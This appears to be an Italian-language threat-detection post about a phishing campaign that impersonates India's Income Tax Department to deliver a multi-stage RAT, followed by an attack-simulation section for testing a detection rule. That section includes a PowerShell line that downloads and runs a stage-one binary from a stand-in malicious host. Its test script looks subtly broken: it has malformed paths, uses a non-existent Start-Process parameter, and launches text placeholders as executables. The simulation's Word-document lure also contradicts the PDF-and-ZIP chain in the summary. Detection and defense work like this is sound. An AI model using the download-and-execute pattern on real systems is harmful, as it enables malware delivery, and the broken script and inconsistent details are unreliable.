SOC Prime Bias: Medio

30 Dec 2025 13:29 UTC

Campagna di Phishing Mima l’Imposta sul Reddito dell’India per Colpire le Aziende

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
Campagna di Phishing Mima l’Imposta sul Reddito dell’India per Colpire le Aziende
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

Un’operazione di phishing che imita il Dipartimento delle Imposte sul Reddito indiano consegna un PDF trappola che conduce i destinatari a un portale di conformità contraffatto. Il sito invita le vittime a scaricare un pacchetto ZIP contenente un installer NSIS firmato, che poi distribuisce un Trojan di Accesso Remoto multi-fase. Il RAT persiste creando un servizio Windows e comunica con più server C2 su porte non standard.

Indagine

I ricercatori hanno analizzato l’esca del PDF, l’URL incorporato e il flusso di lavoro concatenato dell’installer NSIS. Hanno documentato i binari rilasciati su disco, la creazione di una cartella di installazione nascosta e la registrazione di NSecRTS.exe come un servizio di Windows. Il report ha anche catturato le comunicazioni in uscita verso tre indirizzi IP e ha evidenziato l’uso di payload firmati lungo tutta la catena di distribuzione.

Mitigazione

Blocca il dominio malevolo e gli indirizzi IP correlati al perimetro e tramite controlli proxy. Rafforza le protezioni email per identificare allegati e link a tema fiscale che portano a portali di conformità simili. Previeni l’esecuzione automatica di installer non affidabili, se possibile, e monitora la creazione di servizi sospetti, specialmente qualsiasi cosa chiamata “Windows Real-time Protection Service.”

Risposta

Genera avvisi sui nomi di file elencati, gli hash e l’attività di registrazione del servizio Windows legati alla catena di infezione. Isola gli endpoint compromessi, acquisisci immagini di memoria e disco ed esegui una scansione forense completa per identificare eventuali ulteriori stadi RAT o strumenti. Rimuovi gli artefatti di persistenza e reimposta le credenziali potenzialmente esposte per prevenire nuove intrusioni.

Flusso di attacco

Esecuzione di Simulazione

Prerequisito: Il Controllo Pre-Flight di Telemetria & Baseline deve essere passato.

Motivazione: Questa sezione dettagliatamente l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta attesa dalla logica di rilevamento.

  • Narrativa dell’Attacco & Comandi:
    Un avversario consegna un’email di phishing intitolata “Avviso Fiscale”. L’allegato è un documento Word malevolo che rilascia setup_Ir5swQ3EpeuBpePEpew=.exe to %TEMP%. La vittima esegue il file, che a sua volta genera Sibuia.exe (il vero payload) come suo figlio. Questa catena padre‑figlio è progettata per bypassare gli avvisi di creazione di processi generici ma viene catturata dalla regola Sigma.

    Passaggi eseguiti sull’host compromesso:

    1. Rilascia il binario di primo stadio:
      $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1
    2. Esegui il binario di primo stadio:
      Start-Process -FilePath $stage1 -NoNewWindow
    3. Il binario di primo stadio crea internamente il binario di secondo stadio Sibuia.exe nella stessa directory e lo avvia: (Simulato dallo script di test qui sotto.)
  • Script di Test sui Regressi:
    Lo script qui sotto riproduce la esatta relazione genitore‑figlio richiesta per attivare la regola.

    # -------------------------------------------------
    # Simulazione di catena di phishing Fiscale-Indiano
    # -------------------------------------------------
    # Define paths
    $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe"
    $stage2 = "$env:TEMPSibuia.exe"
    
    # Create dummy binaries (zero‑byte – sufficient for Sysmon logging)
    Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII
    Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII
    
    # Ensure files are executable (Windows does not need chmod)
    Write-Host "[*] Launching stage1..."
    $proc1 = Start-Process -FilePath $stage1 -PassThru
    
    # Give stage1 a moment to “spawn” stage2 (simulated by direct launch)
    Start-Sleep -Milliseconds 500
    
    Write-Host "[*] Stage1 spawning stage2 (Sibuia.exe)..."
    $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id
    
    Write-Host "[+] Simulation complete. Verify detection in SIEM."
    # -------------------------------------------------
  • Comandi di Pulizia:
    Rimuovi gli artefatti e termina eventuali processi residui.

    # Stop any leftover processes
    Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force
    Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Delete files
    Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue
    
    Write-Host "[*] Cleanup complete."